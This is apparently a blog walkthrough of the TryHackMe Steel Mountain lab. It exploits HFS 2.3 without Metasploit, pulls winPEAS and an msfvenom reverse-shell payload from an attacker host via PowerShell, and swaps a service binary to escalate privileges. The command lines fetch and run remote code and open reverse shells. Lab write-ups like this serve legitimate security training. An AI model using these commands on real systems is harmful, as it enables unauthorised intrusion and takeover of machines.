TryHackMe — Steel Mountain w/o MSF

Utilize PowerShell commands and winPEAS to enumerate the system and collect the relevant information to escalate privilege.

Image for post
Image for post

Machine Information:

Image for post
Image for post

[1]NMAP Scan

sudo nmap -A -T -p- 10.10.255.1 -oN nmap_scan

Image for post
Image for post

[2]Research vulnerability

searchsploit hfs 2.3
searchsploit -x 39161.py

Image for post
Image for post

[3]Edit exploit

Image for post
Image for post

[4]Setup HTTP server to serve nc.exe and winPEAS

sudo python -m SimpleHTTPServer 80

Image for post
Image for post

[5]Setup a netcat listener then run exploit

nc -lvnp 4444

python exploit.py 10.10.255.1 8080

Image for post
Image for post
Image for post
Image for post

[6]Download winPEAS for Privilege Escalation

powershell -c “Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe”

Image for post
Image for post
Image for post
Image for post

[7]Run winPEAS

winPEAS.exe

Image for post
Image for post
Image for post
Image for post

[8]Create msfvenom payload and setup a netcat listener

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe

nc -lvnp 1234

Image for post
Image for post

[9]Stop service

sc stop AdvancedSystemCareService9

Image for post
Image for post

[10]Download payload under the directory of the target service then start service

powershell -c “Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"

sc start AdvancedSystemCareService9

Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

References:

https://tryhackme.com/room/steelmountain

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Written by

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store